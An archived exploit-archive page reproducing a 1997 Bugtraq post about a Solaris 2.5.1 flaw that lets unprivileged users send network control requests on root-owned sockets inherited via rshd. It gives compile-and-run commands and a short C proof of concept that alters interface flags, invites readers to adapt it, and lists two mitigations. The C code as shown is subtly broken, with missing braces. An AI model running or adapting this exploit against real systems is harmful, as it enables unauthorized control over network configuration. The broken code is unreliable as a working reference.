Solaris root socket descriptor bug

Description:You can swipe control of a root owned socket descriptor from user-owned inetd processes like rshd.
Author:Alan Cox (alan@LXORGUK.UKUU.ORG.UK)
Compromise:control of a root owned socket
Vulnerable Systems:Solaris 2.5.1, probably earlier versions. I hear that 2.6 if fixed. Sun doesn't seem interested in fixing this, for some reason.
Date:19 June 1997 was the data of this post, although Alan has been complaining about the bug for ages.
Notes:You may have to change your interface to le0, hme0, or whatever to make it work.

Solaris 2.5.1 party piece

Thu, 19 Jun 1997 15:27:39 +0100 

     Next in thread: Doug Hughes: "Re: Solaris 2.5.1 party piece" 

 Well CERT have had this for a year, AUSCERT for a couple of weeks and
now its time bugtraq had it

cc solarisuck.c -o solarisuck -lsocket
rsh localhost ./solarisuck


#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/sockio.h>
#include <net/if.h>
#include <netinet/in.h>

int main(int argc, char *argv[])
        struct ifreq please_break_me;

        strcpy( please_break_me.ifr_name, "lo0");

        if(ioctl(0, SIOCSIFFLAGS, &please_break_me)==-1)
                perror("Damn it didnt work. Obviously not Solaris ;)");

You can adjust this to do other things. Basically any user can do network control
requests on a root created socket descriptor.

 1.  Disable rsh and any non root owned inetd tasks -  breaks remote tar etc
 2.  Run an OS that the vendor doesnt take a year to fix bugs in

 I have the original emails from Sun folks (Casper Dik, Alec Muffett and co)
 to prove Sun have sat on this for ages.


More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: